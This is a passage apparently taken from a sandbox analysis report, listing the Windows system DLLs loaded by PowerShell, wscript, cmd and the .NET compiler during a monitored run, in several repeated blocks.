                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\DeviceCredentialDeployment.exeSection loaded: devicecredential.dllJump to behavior
                  Source: C:\Windows\System32\DeviceCredentialDeployment.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\DeviceCredentialDeployment.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\DeviceCredentialDeployment.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
